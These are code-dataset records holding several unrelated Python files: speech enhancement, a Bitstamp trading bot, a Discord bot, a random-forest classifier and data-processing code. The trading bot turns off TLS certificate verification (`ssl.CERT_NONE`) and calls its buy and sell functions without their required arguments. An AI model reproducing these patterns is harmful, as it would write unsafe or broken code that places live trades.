383, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 383, "usage_type": "name"}, {"api_name": "serializers.HighSchoolWithResultsSerializer", "line_number": 384, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 386, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 386, "usage_type": "name"}, {"api_name": "serializers.ShortOdcResultsSerializer", "line_number": 387, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 393, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 393, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 393, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 404, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 409, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 409, "usage_type": "name"}, {"api_name": "models.OdcInfoSpec.objects.all", "line_number": 410, "usage_type": "call"}, {"api_name": "models.OdcInfoSpec.objects", "line_number": 410, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpec", "line_number": 410, "usage_type": "name"}, {"api_name": "serializers.SpecSerializer", "line_number": 411, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 414, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 414, "usage_type": "name"}, {"api_name": "models.OdcInfoSpecGroup.objects.all", "line_number": 415, "usage_type": "call"}, {"api_name": "models.OdcInfoSpecGroup.objects", "line_number": 415, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpecGroup", "line_number": 415, "usage_type": "name"}, {"api_name": "serializers.SpecGroupSerializer", "line_number": 416, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 419, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 419, "usage_type": "name"}, {"api_name": "models.OdcInfoSpecGroup.objects.all", "line_number": 420, "usage_type": "call"}, {"api_name": "models.OdcInfoSpecGroup.objects", "line_number": 420, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpecGroup", "line_number": 420, "usage_type": "name"}, {"api_name": "serializers.GroupSerializer", "line_number": 421, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 427, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 427, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.all", "line_number": 428, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 428, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 428, "usage_type": "name"}, {"api_name": "serializers.OdcResultsSerializer", "line_number": 429, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 431, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 431, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.all", "line_number": 432, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 432, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 432, "usage_type": "name"}, {"api_name": "serializers.OdcResultsSerializer", "line_number": 433, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.all", "line_number": 437, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 437, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 437, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 443, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 443, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.all", "line_number": 444, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 444, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 444, "usage_type": "name"}, {"api_name": "serializers.PlanSerializer", "line_number": 445, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 447, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 447, "usage_type": "name"}, {"api_name": "serializers.PlanSerializer", "line_number": 448, "usage_type": "name"}, {"api_name": "models.OdcInfoSpec.objects.filter", "line_number": 452, "usage_type": "call"}, {"api_name": "models.OdcInfoSpec.objects", "line_number": 452, "usage_type": "attribute"}, {"api_name": "models.OdcInfoSpec", "line_number": 452, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 453, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 453, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 453, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 455, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 455, "usage_type": "name"}, {"api_name": "serializers.PlanSerializer", "line_number": 456, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 460, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 460, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 460, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 465, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 465, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.all", "line_number": 466, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 466, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 466, "usage_type": "name"}, {"api_name": "serializers.SearchResultSerializer", "line_number": 467, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.all", "line_number": 472, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 472, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 472, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 477, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 477, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.all", "line_number": 478, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 478, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 478, "usage_type": "name"}, {"api_name": "serializers.SearchResultSerializer", "line_number": 479, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.all", "line_number": 483, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 483, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 483, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 488, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 488, "usage_type": "name"}, {"api_name": "models.OdcResultsBins.objects.all", "line_number": 489, "usage_type": "call"}, {"api_name": "models.OdcResultsBins.objects", "line_number": 489, "usage_type": "attribute"}, {"api_name": "models.OdcResultsBins", "line_number": 489, "usage_type": "name"}, {"api_name": "serializers.OdcResultsBinsSerializer", "line_number": 490, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 497, "usage_type": "call"}, {"api_name": "django.db.models.Count", "line_number": 498, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects.filter", "line_number": 499, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 499, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 499, "usage_type": "name"}, {"api_name": "django.db.models.Sum", "line_number": 501, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 502, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 503, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 504, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 505, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 506, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 507, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 508, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 509, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 510, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 511, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 512, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 513, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 514, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 515, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 516, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 538, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 538, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 538, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 540, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 540, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 540, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 559, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 559, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 559, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 561, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 561, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 561, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 562, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 580, "usage_type": "call"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 582, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 582, "usage_type": "name"}, {"api_name": "models.OdcResultsBins.objects.all", "line_number": 583, "usage_type": "call"}, {"api_name": "models.OdcResultsBins.objects", "line_number": 583, "usage_type": "attribute"}, {"api_name": "models.OdcResultsBins", "line_number": 583, "usage_type": "name"}, {"api_name": "serializers.OdcResultsBinsSerializer", "line_number": 584, "usage_type": "name"}, {"api_name": "models.OdcInfoHighschool.objects.filter", "line_number": 595, "usage_type": "call"}, {"api_name": "models.OdcInfoHighschool.objects", "line_number": 595, "usage_type": "attribute"}, {"api_name": "models.OdcInfoHighschool", "line_number": 595, "usage_type": "name"}, {"api_name": "django.db.models.Sum", "line_number": 598, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 599, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 600, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 601, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 602, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 603, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 604, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 605, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 606, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 607, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 608, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 609, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 610, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 611, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 612, "usage_type": "call"}, {"api_name": "django.db.models.Sum", "line_number": 613, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 639, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 639, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 639, "usage_type": "name"}, {"api_name": "models.OdcPlan.objects.filter", "line_number": 641, "usage_type": "call"}, {"api_name": "models.OdcPlan.objects", "line_number": 641, "usage_type": "attribute"}, {"api_name": "models.OdcPlan", "line_number": 641, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 661, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 661, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 661, "usage_type": "name"}, {"api_name": "models.OdcResults.objects.filter", "line_number": 663, "usage_type": "call"}, {"api_name": "models.OdcResults.objects", "line_number": 663, "usage_type": "attribute"}, {"api_name": "models.OdcResults", "line_number": 663, "usage_type": "name"}, {"api_name": "django.db.models.Count", "line_number": 664, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 685, "usage_type": "call"}, {"api_name": "forms.RegistrationForm", "line_number": 690, "usage_type": "name"}, {"api_name": "forms.RegistrationForm", "line_number": 697, "usage_type": "name"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 706, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 709, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 713, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 715, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 724, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 726, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.get", "line_number": 728, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 728, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 728, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 729, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects.create_user", "line_number": 731, "usage_type": "call"}, {"api_name": "django.contrib.auth.models.User.objects", "line_number": 731, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.models.User", "line_number": 731, "usage_type": "name"}, {"api_name": "models.UserInfo", "line_number": 732, "usage_type": "call"}, {"api_name": "django.contrib.auth.authenticate", "line_number": 737, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 738, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 745, "usage_type": "call"}]} +{"seq_id": "4446840045", "text": "#!/usr/bin/env python3\n\n\"\"\"\nCreated on Tue May 1 20:43:28 2018\n@author: eesungkim\n\"\"\"\nimport os\nimport math\n\nimport librosa\nimport numpy as np\nimport scipy.io.wavfile as wav\nfrom utils.estnoise_ms import * \nfrom utils.utils import * \n\ndef MMSE_STSA(path_noisy_test, output_path_estimated_noisy_test, sr, noisy_test, NFFT, hop_length_sample, winfunc):\n\t\"\"\"Speech Enhancement using A Spectral Amplitude Estimator\n\t\"\"\"\n\t\n\tsmoothFactorDD=0.99\n\tmaxPosteriorSNR= 100 \n\tminPosteriorSNR= 1\n\t# the variance of the speech; lambda_x(k)\n\t#noisy\n\n\t# print(noisy_test.dtype)\n\tstft_noisy_test = librosa.stft(noisy_test, n_fft=NFFT, hop_length=hop_length_sample, window=winfunc)\n\tmagnitude_noisy_test, phase_noisy_test = divide_magphase(stft_noisy_test, power=1)\n\t\t\n\tpSpectrum = magnitude_noisy_test**2\n\n\t# estimate the variance of the noise using minimum statistics noise PSD estimation ; lambda_d(k). \n\testNoise = estnoisem(pSpectrum,hop_length_sample/sr)\n\testNoise = estNoise\n\t\n\taPosterioriSNR=pSpectrum/estNoise\n\taPosterioriSNR=aPosterioriSNR\n\taPosterioriSNR[aPosterioriSNR > maxPosteriorSNR] = maxPosteriorSNR\n\taPosterioriSNR[aPosterioriSNR < minPosteriorSNR] = minPosteriorSNR\n\n\tpreviousGainedaPosSNR=1 \n\t(nFrames,nFFT2) = pSpectrum.shape\t\t\t\t\n\ttotalGain =[]\n\tfor i in range(nFFT2):\t\t\t\t\t\t \n\t\taPosterioriSNR_frame = aPosterioriSNR[:,i]\t\t\t\t \n\t\t\n\t\t#operator [2](52)\n\t\toper=aPosterioriSNR_frame-1\n\t\toper[oper < 0] = 0 \n\t\tsmoothed_a_priori_SNR = smoothFactorDD * previousGainedaPosSNR + (1-smoothFactorDD) * oper\n\t\t\n\t\t#V for MMSE estimate ([2](8)) \n\t\tV=smoothed_a_priori_SNR*aPosterioriSNR_frame/(1+smoothed_a_priori_SNR)\n\n\t\t#Calculate Gain function which results from the MMSE [2](7),(12).\n\t\tgain= smoothed_a_priori_SNR/(1+smoothed_a_priori_SNR) \n\t\tif any(V<1):\n\t\t\tgain[V<1] = (math.gamma(1.5) * np.sqrt(V[V<1])) / aPosterioriSNR_frame[V<1] * np.exp(-1 * V[V<1] / 2) * ((1 + V[V<1]) * bessel(0, V[V<1] / 2) + V[V<1] * bessel(1, V[V<1] / 2))\n\t\t\n\t\tpreviousGainedaPosSNR = (gain**2) * aPosterioriSNR_frame\n\t\ttotalGain.append(gain)\n\t\n\ttotalGain=np.array(totalGain)\n\n\tmagnitude_estimated_clean = totalGain.T * magnitude_noisy_test\n\tstft_reconstructed_clean = merge_magphase(magnitude_estimated_clean, phase_noisy_test)\n\tsignal_reconstructed_clean =librosa.istft(stft_reconstructed_clean, hop_length=hop_length_sample, window=winfunc)\n\tsignal_reconstructed_clean=signal_reconstructed_clean.astype('int16')\n\t\n\t# wav.write(output_path_estimated_noisy_test,sr,signal_reconstructed_clean)\n\n\treturn signal_reconstructed_clean, sr\n\ndef plot_signals(noisy_test,signal_reconstructed_clean,sr,NFFT,hop_length_sample):\n\n\tsignal_reconstructed_clean = np.float32(signal_reconstructed_clean)\n\tshow_signal(noisy_test,signal_reconstructed_clean,sr)\n\tshow_spectrogram(noisy_test, signal_reconstructed_clean,sr,NFFT,hop_length_sample)\n\n\t\nif __name__ == '__main__':\n\targs = parse_args()\n\tMMSE_STSA(args)\n\n", "repo_name": "rcaravaca/proyecto_procesamiento_de_sonido", "sub_path": "MMSE_STSA/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2871, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "librosa.stft", "line_number": 27, "usage_type": "call"}, {"api_name": "math.gamma", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "librosa.istft", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "28058245025", "text": "import ssl\r\nimport json\r\n\r\nimport websocket\r\nimport bitstamp.client\r\nimport credenciais\r\n\r\ndef cliente():\r\n return bitstamp.client.Trading(username=credenciais.USERNAME, key=credenciais.KEY, secret= credenciais.SECRET)\r\n\r\n\r\ndef comprar(quantidade):\r\n trading_client= cliente()\r\n trading_client.buy_market_order(quantidade)\r\n\r\ndef vender(quantidade):\r\n trading_client= cliente()\r\n trading_client.sell_market_order(quantidade)\r\n\r\ndef ao_abrir(ws):\r\n print(\"ABRIU!\")\r\n\r\n json_subscrible= \"\"\"\r\n {\r\n \"event\": \"bts:subscribe\",\r\n \"data\": {\r\n \"channel\": \"live_trades_btcusd\"\r\n }\r\n} \r\n\"\"\"\r\n ws.send(json_subscrible)\r\n \r\ndef ao_fechar(ws):\r\n print(\"FECHOU!\")\r\n\r\ndef erro(ws,erro):\r\n print(\"ERRO!\")\r\n print(erro)\r\n \r\n\r\ndef ao_receber_mensagem(ws, mensagem):\r\n try:\r\n print(\"MENSAGEM!\")\r\n mensagem= json.loads(mensagem)\r\n print(mensagem['data']['price'])\r\n\r\n global preco\r\n preco= mensagem['data']['price']\r\n if preco > 17000:\r\n vender()\r\n elif preco < 16000:\r\n comprar()\r\n else:\r\n print(\"AGUARDAR!\")\r\n\r\n except Exception as error:\r\n print(error)\r\n\r\n\r\nif __name__== \"__main__\":\r\n \r\n ws = websocket.WebSocketApp(\"wss://ws.bitstamp.net\",\r\n on_open= ao_abrir,\r\n on_message=ao_receber_mensagem,\r\n on_close=ao_fechar,\r\n on_error=erro)\r\n \r\n ws.run_forever(sslopt={\"cert_reqs\": ssl.CERT_NONE})\r\n ", "repo_name": "Leo-Drt/Bot_bitcoin", "sub_path": "bot_bitcoin.py", "file_name": "bot_bitcoin.py", "file_ext": "py", "file_size_in_byte": 1578, "program_lang": "python", "lang": "pt", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "bitstamp.client.client.Trading", "line_number": 9, "usage_type": "call"}, {"api_name": "bitstamp.client.client", "line_number": 9, "usage_type": "attribute"}, {"api_name": "bitstamp.client", "line_number": 9, "usage_type": "name"}, {"api_name": "credenciais.USERNAME", "line_number": 9, "usage_type": "attribute"}, {"api_name": "credenciais.KEY", "line_number": 9, "usage_type": "attribute"}, {"api_name": "credenciais.SECRET", "line_number": 9, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 44, "usage_type": "call"}, {"api_name": "websocket.WebSocketApp", "line_number": 62, "usage_type": "call"}, {"api_name": "ssl.CERT_NONE", "line_number": 68, "usage_type": "attribute"}]} +{"seq_id": "33176166475", "text": "from os import system\nfrom settings import config\nfrom settings.keep_alive import keep_alive\nfrom disnake import Intents, HTTPException, ApplicationCommandInteraction\nfrom disnake.ext import commands, tasks\nfrom utils.constants import RAPAX_GUILD\n\nif __name__ == \"__main__\":\n\n # Bots setup\n intents = Intents.default()\n intents.members = True\n bot = commands.InteractionBot(intents=intents,\n test_guilds=[RAPAX_GUILD])\n extensions = [\"moderation\", \"entertainment\", \"event\", \"nickname\"]\n for extension in extensions:\n try:\n bot.load_extension(\"extensions.\" + extension)\n except Exception as error:\n print(\"{} cannot be loaded. [{}]\".format(extension, error))\n\n # Bot test slash command\n @bot.slash_command(description=\"Pong!\")\n async def ping(inter: ApplicationCommandInteraction):\n await inter.response.send_message(\"Pong! `\" + str(round(bot.latency * 1000)) + \"ms`\")\n\n # Bot loop\n @tasks.loop(seconds=10.0)\n async def foo():\n return\n\n # Run bot\n try:\n keep_alive()\n bot.run(config.data[\"DISCORD_TOKEN\"])\n except HTTPException as e:\n if e.status == 429:\n print(\"Discord servers denied the connection: too many requests\")\n print(\"\\n\\n\\nBLOCKED BY RATE LIMITS\\nRESTARTING NOW\\n\\n\\n\")\n system(\"python ./settings/restarter.py\")\n system('kill 1')\n else:\n raise e\n", "repo_name": "Law7iet/RapaxBot", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1469, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "disnake.Intents.default", "line_number": 11, "usage_type": "call"}, {"api_name": "disnake.Intents", "line_number": 11, "usage_type": "name"}, {"api_name": "disnake.ext.commands.InteractionBot", "line_number": 13, "usage_type": "call"}, {"api_name": "disnake.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "utils.constants.RAPAX_GUILD", "line_number": 14, "usage_type": "name"}, {"api_name": "disnake.ApplicationCommandInteraction", "line_number": 24, "usage_type": "name"}, {"api_name": "disnake.ext.tasks.loop", "line_number": 28, "usage_type": "call"}, {"api_name": "disnake.ext.tasks", "line_number": 28, "usage_type": "name"}, {"api_name": "settings.keep_alive.keep_alive", "line_number": 34, "usage_type": "call"}, {"api_name": "settings.config.data", "line_number": 35, "usage_type": "attribute"}, {"api_name": "settings.config", "line_number": 35, "usage_type": "name"}, {"api_name": "disnake.HTTPException", "line_number": 36, "usage_type": "name"}, {"api_name": "os.system", "line_number": 40, "usage_type": "call"}, {"api_name": "os.system", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "27047716935", "text": "import argparse\nimport pandas as pd\nimport numpy as np\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import f1_score\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import classification_report\n\nimport matplotlib.pyplot as plt\nfrom sklearn import metrics\n\n\ndef tuneRF(xTrain, yTrain):\n # Number of trees in random forest\n n_estimators = [int(x) for x in np.linspace(50, 500, num=5)]\n # Number of features to consider at every split\n max_features = ['sqrt', 'auto']\n # Maximum number of levels in tree\n max_depth = [int(x) for x in np.linspace(5, 30, num=5)]\n max_depth.append(None)\n # Minimum number of samples required at each leaf node\n min_samples_leaf = [1, 2, 4]\n parameters = {'n_estimators': n_estimators,\n 'max_features': max_features,\n 'max_depth': max_depth,\n 'min_samples_leaf': min_samples_leaf,\n }\n\n model = GridSearchCV(RandomForestClassifier(), parameters, cv=5, scoring='f1_macro', verbose=1)\n model.fit(xTrain, yTrain)\n return model\n\n\ndef train_test(xTrain, yTrain, xTest, yTest):\n rf = RandomForestClassifier(random_state=42).fit(xTrain, yTrain)\n print(\"Parameter using: \\n\", rf.get_params())\n score(rf, xTest, yTest)\n print(\"\\nTuning:\")\n model = tuneRF(xTrain, yTrain)\n print(\"Best parameters: \\n\", model.best_params_)\n score(model, xTest, yTest)\n\n return model\n\n\ndef score(model, xTest, yTest):\n yHat = model.predict(xTest)\n print(classification_report(yTest, yHat))\n print(\"F1 score: \", f1_score(yTest, yHat))\n return\n\n\n# def train_(xTrain, yTrain):\n\n\n# def test_(model, xTest):\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--train\",\n default=\"../data/Train.csv\",\n help=\"file name of the training dataset\")\n parser.add_argument(\"--test\",\n default=\"../data/Test.csv\",\n help=\"file name of the testing dataset\")\n args = parser.parse_args()\n train = pd.read_csv(args.train)\n test = pd.read_csv(args.test)\n\n # separating x and y\n yTrain = train['HeartDisease'].copy(deep=True)\n xTrain = train.drop(columns=['HeartDisease'])\n yTest = test['HeartDisease'].copy(deep=True)\n xTest = test.drop(columns=['HeartDisease'])\n\n # proper scaling\n stdScale = StandardScaler().fit(xTrain)\n xTrain = stdScale.transform(xTrain)\n xTest = stdScale.transform(xTest)\n\n # model = train_test(xTrain, yTrain, xTest, yTest)\n rf = RandomForestClassifier(max_depth=17, max_features='auto', min_samples_leaf=2, n_estimators=50)\n rf.fit(xTrain, yTrain)\n metrics.plot_roc_curve(rf, xTest, yTest)\n plt.show()\n\nif __name__ == '__main__':\n main()\n\n# Fitting 5 folds for each of 180 candidates, totalling 900 fits\n# Best parameters: \n# {'max_depth': 17, 'max_features': 'auto', 'min_samples_leaf': 2, 'n_estimators': 50}\n# precision recall f1-score support\n\n# 0 0.83 0.87 0.85 121\n# 1 0.91 0.88 0.90 182\n\n# accuracy 0.88 303\n# macro avg 0.87 0.88 0.87 303\n# weighted avg 0.88 0.88 0.88 303\n\n# F1 score: 0.8969359331476322\n", "repo_name": "Lukas-Xue/Heart-Failure-Prediction", "sub_path": "code/rf.py", "file_name": "rf.py", "file_ext": "py", "file_size_in_byte": 3490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.linspace", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 22, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 32, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 38, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.metrics.f1_score", "line_number": 52, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 63, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 71, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 72, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 81, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestClassifier", "line_number": 86, "usage_type": "call"}, {"api_name": "sklearn.metrics.plot_roc_curve", "line_number": 88, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}]} +{"seq_id": "28892112824", "text": "'''\n 获取数据之后处理数据\n'''\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport time\nfrom collections import defaultdict,Counter,namedtuple\nfrom untils import plotManyLines,fomartMonth,plotNowDiffer\n\n'''处理因变量的方法集合'''\nclass dealY:\n def __init__(self):\n pass\n def removeOutliers(self,date2Company2Profit):#去掉异常值\n showComs = []\n # 计算不同季度的 总值\n date2Sum = {}\n for oneDate in date2Company2Profit:\n profits = 0\n for oneCom in date2Company2Profit[oneDate]:\n profits+= abs(date2Company2Profit[oneDate][oneCom])\n date2Sum[oneDate] = profits\n # print(date2Sum)\n \n dates = sorted(list(date2Sum.keys()))\n # plotManyLines(dates,[[date2Sum[i] for i in dates]],\"季度\",\"利润\",\"板块获利\")\n # 获得需要展示的公司\n x,ys1,com1 = self.showImportantC(date2Company2Profit,date2Sum,1)\n x,ys2 ,com2= self.showImportantC(date2Company2Profit,date2Sum,10)\n # plotNowDiffer(x,ys1,ys2,com1,[])#=================================\n # dates =list( date2Company2Profit.keys())\n # dates.sort()\n # for oneDate in dates:\n # comPro = []#(公司名,获利)\n \n # for oneCompany in date2Company2Profit[oneDate]:\n # comPro.append((oneCompany,date2Company2Profit[oneDate][oneCompany]))\n # comPro.sort(key=lambda x:x[1],reverse=True)\n # # print(len(comPro))\n # #获利max\n # for index in range(min(1,len(comPro))):\n # showComs.append(comPro[index][0])\n # # dateCom.append((oneDate,comPro[index][0]))\n # # print(len(comPro))\n # #损失max\n # comPro.sort(key=lambda x:x[1])\n # for index in range(min(1,len(comPro))):\n # showComs.append(comPro[index][0])\n # # 